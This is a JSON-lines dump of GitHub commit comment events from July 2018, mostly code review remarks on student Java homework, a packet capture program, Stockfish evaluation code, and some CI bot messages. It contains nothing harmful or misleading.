{"id":"8034391384","type":"CommitCommentEvent","actor":{"login":"roconnor"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29875895,"position":null,"line":null,"path":null,"commit_id":"77f3ac7b7638b33ab198330eaabbd6e0a2e751a9","created_at":"2018-07-29T18:06:19Z","updated_at":"2018-07-29T18:06:19Z","author_association":"CONTRIBUTOR","body":"We probably can use https://github.com/bitcoin/bitcoin/blob/master/contrib/verifybinaries/verify.sh as a model."}},"created_at":"2018-07-29T18:06:19Z"}
{"id":"8034391509","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29875897,"position":1,"line":1,"path":"src/Homework7/HW9/Homework9Task2Students/ListOfStudents.java","commit_id":"20030ff3b1cc489a6e13d7b0559eb5be1159f4a5","created_at":"2018-07-29T18:06:24Z","updated_at":"2018-07-29T18:06:24Z","author_association":"NONE","body":"название пакетов не по код конвеншену, все с маленькой буквы и в единственном числе"}},"created_at":"2018-07-29T18:06:24Z"}
{"id":"8034394153","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"moon2263/packet_capture"},"payload":{"comment":{"id":29875908,"position":26,"line":26,"path":"main.cpp","commit_id":"cb3c0e7f6c1c5c1c326f00c27c7fb50c5448fd3c","created_at":"2018-07-29T18:07:57Z","updated_at":"2018-07-29T18:07:57Z","author_association":"NONE","body":"ip_protocal > ip_protocol"}},"created_at":"2018-07-29T18:07:57Z"}
{"id":"8034394725","type":"CommitCommentEvent","actor":{"login":"samuelbporto"},"repo":{"name":"samuelbrehm/GraphQL-Node-API"},"payload":{"comment":{"id":29875910,"position":null,"line":null,"path":null,"commit_id":"84739ec0fc55cb59bb53a9b1065e4e7a87ad0f7e","created_at":"2018-07-29T18:08:22Z","updated_at":"2018-07-29T18:08:22Z","author_association":"NONE","body":"Feito."}},"created_at":"2018-07-29T18:08:22Z"}
{"id":"8034396025","type":"CommitCommentEvent","actor":{"login":"ptorrezao"},"repo":{"name":"ptorrezao/PTZ.HomeManagement"},"payload":{"comment":{"id":29875913,"position":null,"line":null,"path":null,"commit_id":"0a967e29119d726816979623f8a76056fe9fb85c","created_at":"2018-07-29T18:09:25Z","updated_at":"2018-07-29T18:09:25Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Importador de Contas - CRUD para Contas](https://trello.com/c/gDkYqkKB/8-importador-de-contas-crud-para-contas)"}},"created_at":"2018-07-29T18:09:25Z"}
{"id":"8034396781","type":"CommitCommentEvent","actor":{"login":"juanvilla1110"},"repo":{"name":"juanvilla1110/Numeros-pares"},"payload":{"comment":{"id":29875917,"position":1,"line":1,"path":"README.md","commit_id":"40099c964727ed07c047e0d957fb08cb57e9022a","created_at":"2018-07-29T18:09:59Z","updated_at":"2018-07-29T18:09:59Z","author_association":"OWNER","body":"#include<iostream>\r\n#include<math.h>\r\n\r\nusing namespace std;\r\n\r\nint main(){\r\n\tint i = 0, y, j = 0, divisor = 0, n = 0, cont = 0, a = 1, divisores, h = 0;\r\n\tcout << \"Numeros pares, primos e impares\" << \"\\n\";\r\n\tcout << endl;\r\n\r\n\tcout << \"Numeros pares\" << \"\\n\";\r\n\r\n\tfor (int i = 2; i < 100; i++){\r\n\t\tif (i % 2 == 0){\r\n\t\t\tcout << i << \"\\n\";\r\n\t\t}\r\n\t}\r\n\tcout << endl << endl;\r\n\tcout << \"Numeors Impares\" << \"\\n\";\r\n\tfor (int j = 0; j < 100; j++){\r\n\t\tif (j % 2 == 0){\r\n\t\t}\r\n\t\telse\r\n\t\t\tcout << j << \"\\n\";\r\n\t}\r\n\tfloat s, t, primo, contador;\r\n\tcout << endl << endl;\r\n\tcout << \"Numeros Primos\" << \"\\n\";\r\n\tfor (int h = 2; h <=150; h++){\r\n\t\tprimo = 0;\r\n\t\tfor (int cont = 1; cont <=150; cont++){\r\n\t\t\tif (h%cont == 0){\r\n\t\t\t\tprimo++;\r\n\t\t\t}\r\n\t\t\t}\r\n\t\tif (primo == 2){\r\n\t\t\tcout << h << \"\\n\";\r\n\t\t}\r\n\t}\r\n\t\r\n\tsystem(\"pause\");\r\n}"}},"created_at":"2018-07-29T18:09:59Z"}
{"id":"8034397387","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"moon2263/packet_capture"},"payload":{"comment":{"id":29875919,"position":93,"line":93,"path":"main.cpp","commit_id":"cb3c0e7f6c1c5c1c326f00c27c7fb50c5448fd3c","created_at":"2018-07-29T18:10:22Z","updated_at":"2018-07-29T18:10:22Z","author_association":"NONE","body":"(ip_header+offset)?\r\ntcp_header 라는 변수에 정확한 TCP헤더의 위치가 들어 가는지 디버깅해 보세요."}},"created_at":"2018-07-29T18:10:22Z"}
{"id":"8034397945","type":"CommitCommentEvent","actor":{"login":"TheAssassin"},"repo":{"name":"Taz8du29/docs.appimage.org"},"payload":{"comment":{"id":29875920,"position":13,"line":13,"path":"source/packaging-guide/distributing.rst","commit_id":"ac892deada1239894c6631dc97a0b5f022b0754f","created_at":"2018-07-29T18:10:45Z","updated_at":"2018-07-29T18:10:45Z","author_association":"CONTRIBUTOR","body":"If possible, please bundle pictures, and don't link to these non-obvious GitHub hosted ones. If they get deleted by them, they're lost forever. And also, this causes users to request `https://*github*.*` pages, which allows for some mild tracking."}},"created_at":"2018-07-29T18:10:45Z"}
{"id":"8034398019","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29875921,"position":14,"line":14,"path":"src/lesson9/task1/ManipulationWithList.java","commit_id":"a32e4735088ea622df040bf10da0b5dd2330ffd3","created_at":"2018-07-29T18:10:48Z","updated_at":"2018-07-29T18:10:48Z","author_association":"NONE","body":"никакого хардкода и магических чисел, все выносим в константы"}},"created_at":"2018-07-29T18:10:48Z"}
{"id":"8034398202","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29875922,"position":11,"line":11,"path":"src/lesson9/task1/ManipulationWithList.java","commit_id":"a32e4735088ea622df040bf10da0b5dd2330ffd3","created_at":"2018-07-29T18:10:56Z","updated_at":"2018-07-29T18:10:56Z","author_association":"NONE","body":"не делать оступов в первой строчке метода"}},"created_at":"2018-07-29T18:10:56Z"}
{"id":"8034398240","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"moon2263/packet_capture"},"payload":{"comment":{"id":29875923,"position":143,"line":143,"path":"main.cpp","commit_id":"cb3c0e7f6c1c5c1c326f00c27c7fb50c5448fd3c","created_at":"2018-07-29T18:10:58Z","updated_at":"2018-07-29T18:10:58Z","author_association":"NONE","body":"sizeof(data) 값은 얼마죠?\r\n제대로 최대 16바이트가 출력이 되는지 확인해 보세요."}},"created_at":"2018-07-29T18:10:58Z"}
{"id":"8034398360","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29875925,"position":5,"line":5,"path":"src/lesson9/task1/ManipulationWithList.java","commit_id":"a32e4735088ea622df040bf10da0b5dd2330ffd3","created_at":"2018-07-29T18:11:04Z","updated_at":"2018-07-29T18:11:04Z","author_association":"NONE","body":"утилитный класс final и private конструктор"}},"created_at":"2018-07-29T18:11:04Z"}
{"id":"8034398628","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29875928,"position":22,"line":22,"path":"src/lesson9/task1/ManipulationWithList.java","commit_id":"a32e4735088ea622df040bf10da0b5dd2330ffd3","created_at":"2018-07-29T18:11:15Z","updated_at":"2018-07-29T18:11:15Z","author_association":"NONE","body":"форматировать код!"}},"created_at":"2018-07-29T18:11:15Z"}
{"id":"8034398724","type":"CommitCommentEvent","actor":{"login":"TheAssassin"},"repo":{"name":"Taz8du29/docs.appimage.org"},"payload":{"comment":{"id":29875929,"position":18,"line":18,"path":"source/packaging-guide/appstream.rst","commit_id":"66ffb5ddef5bf2670330f27947d40515333da532","created_at":"2018-07-29T18:11:19Z","updated_at":"2018-07-29T18:11:19Z","author_association":"CONTRIBUTOR","body":"It's \"AppStream\"."}},"created_at":"2018-07-29T18:11:19Z"}
{"id":"8034399298","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29875930,"position":20,"line":20,"path":"src/lesson9/task2/Student.java","commit_id":"a32e4735088ea622df040bf10da0b5dd2330ffd3","created_at":"2018-07-29T18:11:47Z","updated_at":"2018-07-29T18:11:47Z","author_association":"NONE","body":"этот метод не должен здесь ничего делать, это должно быть в утилитных классах"}},"created_at":"2018-07-29T18:11:47Z"}
{"id":"8034399777","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29875937,"position":35,"line":35,"path":"src/lesson9/task2/Student.java","commit_id":"a32e4735088ea622df040bf10da0b5dd2330ffd3","created_at":"2018-07-29T18:12:11Z","updated_at":"2018-07-29T18:12:11Z","author_association":"NONE","body":"то же самое, выносить в утилитные классы вывод на консоль"}},"created_at":"2018-07-29T18:12:11Z"}
{"id":"8034400168","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29875938,"position":75,"line":75,"path":"src/lesson9/task2/Student.java","commit_id":"a32e4735088ea622df040bf10da0b5dd2330ffd3","created_at":"2018-07-29T18:12:25Z","updated_at":"2018-07-29T18:12:25Z","author_association":"NONE","body":"не надо столько лишних отступов делать"}},"created_at":"2018-07-29T18:12:25Z"}
{"id":"8034400206","type":"CommitCommentEvent","actor":{"login":"whyang0808"},"repo":{"name":"whyang0808/learning-css"},"payload":{"comment":{"id":29875940,"position":null,"line":null,"path":null,"commit_id":"03bcd598dfec87e7dbe9238c47ad48e11eae5f78","created_at":"2018-07-29T18:12:27Z","updated_at":"2018-07-29T18:12:27Z","author_association":"OWNER","body":"CSS More Selectors Summary: [css-03b-more-selectors-summary.pdf](https://github.com/whyang0808/learning-css/files/2239045/css-03b-more-selectors-summary.pdf)\r\n"}},"created_at":"2018-07-29T18:12:27Z"}
{"id":"8034401606","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29875944,"position":5,"line":5,"path":"src/lesson7/Test.java","commit_id":"930a268b313a1f4ded8c75089112d665ec4b66b3","created_at":"2018-07-29T18:13:27Z","updated_at":"2018-07-29T18:13:27Z","author_association":"NONE","body":"не использовать множественный импорт, не по код конвеншену. Исправить в настроках идеи, я показывал как"}},"created_at":"2018-07-29T18:13:27Z"}
{"id":"8034401961","type":"CommitCommentEvent","actor":{"login":"jynnie"},"repo":{"name":"jynnie/accountability"},"payload":{"comment":{"id":29875946,"position":null,"line":null,"path":null,"commit_id":"d5f7e623f88f43d285ad5c5317069007526f2797","created_at":"2018-07-29T18:13:42Z","updated_at":"2018-07-29T18:13:42Z","author_association":"OWNER","body":"Shannon, why have I still not seen this ;-;"}},"created_at":"2018-07-29T18:13:42Z"}
{"id":"8034402483","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29875948,"position":8,"line":8,"path":"src/lesson7/helpingclassesandinterfaces/ShapeUtils.java","commit_id":"930a268b313a1f4ded8c75089112d665ec4b66b3","created_at":"2018-07-29T18:14:05Z","updated_at":"2018-07-29T18:14:05Z","author_association":"NONE","body":"утилитный класс final и private конструктор"}},"created_at":"2018-07-29T18:14:05Z"}
{"id":"8034402612","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29875950,"position":20,"line":20,"path":"src/lesson7/helpingclassesandinterfaces/ShapeUtils.java","commit_id":"930a268b313a1f4ded8c75089112d665ec4b66b3","created_at":"2018-07-29T18:14:10Z","updated_at":"2018-07-29T18:14:10Z","author_association":"NONE","body":"код не отформатирован"}},"created_at":"2018-07-29T18:14:10Z"}
{"id":"8034404805","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29875963,"position":18,"line":18,"path":"src/lesson7/helpingclassesandinterfaces/ShapeUtils.java","commit_id":"930a268b313a1f4ded8c75089112d665ec4b66b3","created_at":"2018-07-29T18:15:40Z","updated_at":"2018-07-29T18:15:40Z","author_association":"NONE","body":"а параллелограмм не четырехугольник? Как-то кастылем попахивает и не совсем верно реализовано"}},"created_at":"2018-07-29T18:15:40Z"}
{"id":"8034405256","type":"CommitCommentEvent","actor":{"login":"mattwynne"},"repo":{"name":"cucumber-ltd/feynman"},"payload":{"comment":{"id":29875964,"position":null,"line":null,"path":null,"commit_id":"f6a42621964639ea9e0b121abb6d814747b30ad4","created_at":"2018-07-29T18:16:02Z","updated_at":"2018-07-29T18:16:02Z","author_association":"COLLABORATOR","body":"I was thinking the same thing."}},"created_at":"2018-07-29T18:16:02Z"}
{"id":"8034405837","type":"CommitCommentEvent","actor":{"login":"ChhabraNitin"},"repo":{"name":"ChhabraNitin/chhabranitin.github.io"},"payload":{"comment":{"id":29875969,"position":null,"line":null,"path":null,"commit_id":"3b1a489e8d8db3e537774d7d646bb795e921d5dd","created_at":"2018-07-29T18:16:26Z","updated_at":"2018-07-29T18:16:26Z","author_association":"OWNER","body":"architect theme for personal website"}},"created_at":"2018-07-29T18:16:26Z"}
{"id":"8034406811","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29875972,"position":15,"line":15,"path":"src/lesson7/shapes/Circle.java","commit_id":"930a268b313a1f4ded8c75089112d665ec4b66b3","created_at":"2018-07-29T18:17:12Z","updated_at":"2018-07-29T18:17:12Z","author_association":"NONE","body":"никаких выводов в консоль! в консоли только тестируем код"}},"created_at":"2018-07-29T18:17:12Z"}
{"id":"8034407627","type":"CommitCommentEvent","actor":{"login":"TheLastZombie"},"repo":{"name":"TheLastZombie/ich_iel"},"payload":{"comment":{"id":29875976,"position":null,"line":null,"path":null,"commit_id":"3a74b069b2e3da3d12cb9c69b32a00164a2fb3a3","created_at":"2018-07-29T18:17:48Z","updated_at":"2018-07-29T18:17:48Z","author_association":"OWNER","body":"mach halt"}},"created_at":"2018-07-29T18:17:48Z"}
{"id":"8034407858","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29875977,"position":38,"line":38,"path":"src/lesson7/shapes/Circle.java","commit_id":"930a268b313a1f4ded8c75089112d665ec4b66b3","created_at":"2018-07-29T18:17:59Z","updated_at":"2018-07-29T18:17:59Z","author_association":"NONE","body":"не извращайся над методов toString, посмотри как идея генерит его и используй такой вариант"}},"created_at":"2018-07-29T18:17:59Z"}
{"id":"8034408179","type":"CommitCommentEvent","actor":{"login":"nichtdasleo"},"repo":{"name":"TheLastZombie/ich_iel"},"payload":{"comment":{"id":29875979,"position":null,"line":null,"path":null,"commit_id":"3a74b069b2e3da3d12cb9c69b32a00164a2fb3a3","created_at":"2018-07-29T18:18:12Z","updated_at":"2018-07-29T18:18:12Z","author_association":"NONE","body":"oida"}},"created_at":"2018-07-29T18:18:12Z"}
{"id":"8034408945","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29875982,"position":31,"line":31,"path":"src/lesson7/shapes/Parallelogram.java","commit_id":"930a268b313a1f4ded8c75089112d665ec4b66b3","created_at":"2018-07-29T18:18:48Z","updated_at":"2018-07-29T18:18:48Z","author_association":"NONE","body":"не надо делать проверок таких, это должно быть вне объекта, до его создания, состояние объекта не должно быть невалидным"}},"created_at":"2018-07-29T18:18:48Z"}
{"id":"8034410749","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"GuardianRM/Stockfish"},"payload":{"comment":{"id":29875986,"position":null,"line":null,"path":null,"commit_id":"b6d5c1da92c950eb6a45792c5db5f5fa95efba4a","created_at":"2018-07-29T18:20:08Z","updated_at":"2018-07-29T18:20:08Z","author_association":"NONE","body":"you can remove the redundant term `~attackedBy2[Them]` because if a square is not attacked by the opponent then it isn't also not attacked twice by them."}},"created_at":"2018-07-29T18:20:08Z"}
{"id":"8034410772","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29875987,"position":112,"line":112,"path":"src/lesson7/shapes/Triangle.java","commit_id":"930a268b313a1f4ded8c75089112d665ec4b66b3","created_at":"2018-07-29T18:20:09Z","updated_at":"2018-07-29T18:20:09Z","author_association":"NONE","body":"совсем не хочешь форматировать код!"}},"created_at":"2018-07-29T18:20:09Z"}
{"id":"8034411712","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29875988,"position":10,"line":10,"path":"src/homework/homework09/Task01.java","commit_id":"e2d8afe8280bd553e0f7d2864f48acd30eefb397","created_at":"2018-07-29T18:20:46Z","updated_at":"2018-07-29T18:20:46Z","author_association":"NONE","body":"Программируем на уровне интерфейсов, а не реализации - поэтому List"}},"created_at":"2018-07-29T18:20:46Z"}
{"id":"8034411964","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29875989,"position":9,"line":9,"path":"src/homework/homework09/Task01.java","commit_id":"e2d8afe8280bd553e0f7d2864f48acd30eefb397","created_at":"2018-07-29T18:20:55Z","updated_at":"2018-07-29T18:20:55Z","author_association":"NONE","body":"никаких оступов в первой строчке метода"}},"created_at":"2018-07-29T18:20:55Z"}
{"id":"8034412143","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29875990,"position":26,"line":26,"path":"src/homework/homework09/Task01.java","commit_id":"e2d8afe8280bd553e0f7d2864f48acd30eefb397","created_at":"2018-07-29T18:21:02Z","updated_at":"2018-07-29T18:21:02Z","author_association":"NONE","body":"а тут зачем лишние отступы?"}},"created_at":"2018-07-29T18:21:02Z"}
{"id":"8034412307","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29875991,"position":28,"line":28,"path":"src/homework/homework09/Task01.java","commit_id":"e2d8afe8280bd553e0f7d2864f48acd30eefb397","created_at":"2018-07-29T18:21:09Z","updated_at":"2018-07-29T18:21:09Z","author_association":"NONE","body":"и здесь не надо оступов"}},"created_at":"2018-07-29T18:21:09Z"}
{"id":"8034412520","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29875993,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-29T18:21:17Z","updated_at":"2018-07-29T18:21:17Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:21:17Z"}
{"id":"8034412560","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29875996,"position":31,"line":31,"path":"src/homework/homework09/Task01.java","commit_id":"e2d8afe8280bd553e0f7d2864f48acd30eefb397","created_at":"2018-07-29T18:21:18Z","updated_at":"2018-07-29T18:21:18Z","author_association":"NONE","body":"то же самое, Программируем на уровне интерфейсов, а не реализации - поэтому List"}},"created_at":"2018-07-29T18:21:18Z"}
{"id":"8034412854","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29875997,"position":34,"line":34,"path":"src/homework/homework09/Task01.java","commit_id":"e2d8afe8280bd553e0f7d2864f48acd30eefb397","created_at":"2018-07-29T18:21:31Z","updated_at":"2018-07-29T18:21:31Z","author_association":"NONE","body":"\r\nникакого хардкода и магических чисел, все выносим в константы"}},"created_at":"2018-07-29T18:21:31Z"}
{"id":"8034413061","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29876001,"position":41,"line":41,"path":"src/homework/homework09/Task01.java","commit_id":"e2d8afe8280bd553e0f7d2864f48acd30eefb397","created_at":"2018-07-29T18:21:41Z","updated_at":"2018-07-29T18:21:41Z","author_association":"NONE","body":"в методе main только проверка написанного, все остальное выносим в отдельные классы (утилитные например)"}},"created_at":"2018-07-29T18:21:41Z"}
{"id":"8034413188","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29876002,"position":null,"line":null,"path":null,"commit_id":"7c600bfd314800d604efbc3dce116afc5804c337","created_at":"2018-07-29T18:21:46Z","updated_at":"2018-07-29T18:21:46Z","author_association":"CONTRIBUTOR","body":"@Sami32 I must have been drunk that day. That said, I really think it should be `setUpClass` or `setupClass`."}},"created_at":"2018-07-29T18:21:46Z"}
{"id":"8034413693","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876004,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-29T18:22:06Z","updated_at":"2018-07-29T18:22:06Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:22:06Z"}
{"id":"8034413848","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"GuardianRM/Stockfish"},"payload":{"comment":{"id":29876005,"position":null,"line":null,"path":null,"commit_id":"b6d5c1da92c950eb6a45792c5db5f5fa95efba4a","created_at":"2018-07-29T18:22:12Z","updated_at":"2018-07-29T18:22:12Z","author_association":"NONE","body":"This is simpler and same bench\r\n`b3 = attackedBy[Us][KING] & ~attackedBy[Them][ALL_PIECES];`\r\n\r\nAlso, since both king will have this exact same bonus/penalty,\r\nYou can simply score as a bonus\r\nconstexpr kingMobility = S(2, 4);\r\nscore += kingMobility  * popcount(b3);\r\n\r\nThis also will give same bench."}},"created_at":"2018-07-29T18:22:12Z"}
{"id":"8034413929","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29876006,"position":12,"line":12,"path":"src/homework/homework09/Task01v2.java","commit_id":"e2d8afe8280bd553e0f7d2864f48acd30eefb397","created_at":"2018-07-29T18:22:15Z","updated_at":"2018-07-29T18:22:15Z","author_association":"NONE","body":"неправильно используешь потоковый ввод-вывод, мы его не проходили, поэтому не надо использовать"}},"created_at":"2018-07-29T18:22:15Z"}
{"id":"8034414368","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29876010,"position":27,"line":27,"path":"src/homework/homework09/Task01v2.java","commit_id":"e2d8afe8280bd553e0f7d2864f48acd30eefb397","created_at":"2018-07-29T18:22:30Z","updated_at":"2018-07-29T18:22:30Z","author_association":"NONE","body":"опять магические числа, быть не должно"}},"created_at":"2018-07-29T18:22:30Z"}
{"id":"8034414392","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876011,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-29T18:22:31Z","updated_at":"2018-07-29T18:22:31Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:22:31Z"}
{"id":"8034414759","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29876013,"position":9,"line":9,"path":"src/homework/homework09/student/AgeComporator.java","commit_id":"e2d8afe8280bd553e0f7d2864f48acd30eefb397","created_at":"2018-07-29T18:22:46Z","updated_at":"2018-07-29T18:22:46Z","author_association":"NONE","body":"есть статические метод Integer.compareTo"}},"created_at":"2018-07-29T18:22:46Z"}
{"id":"8034415554","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876018,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-29T18:23:17Z","updated_at":"2018-07-29T18:23:17Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:23:17Z"}
{"id":"8034424773","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876070,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-29T18:29:52Z","updated_at":"2018-07-29T18:29:52Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:29:52Z"}
{"id":"8034425516","type":"CommitCommentEvent","actor":{"login":"smiths"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29876074,"position":null,"line":null,"path":null,"commit_id":"03fdd1b0d597613250c017996c8acfbacd22aa3c","created_at":"2018-07-29T18:30:18Z","updated_at":"2018-07-29T18:30:18Z","author_association":"OWNER","body":"I fixed the make errors on my machine (in https://github.com/smiths/caseStudies/commit/0252f54777ba1b0cd0627d4646fd9edd1b5344e3) by changing the file names.  This could have broken the tests for the Windows machines."}},"created_at":"2018-07-29T18:30:18Z"}
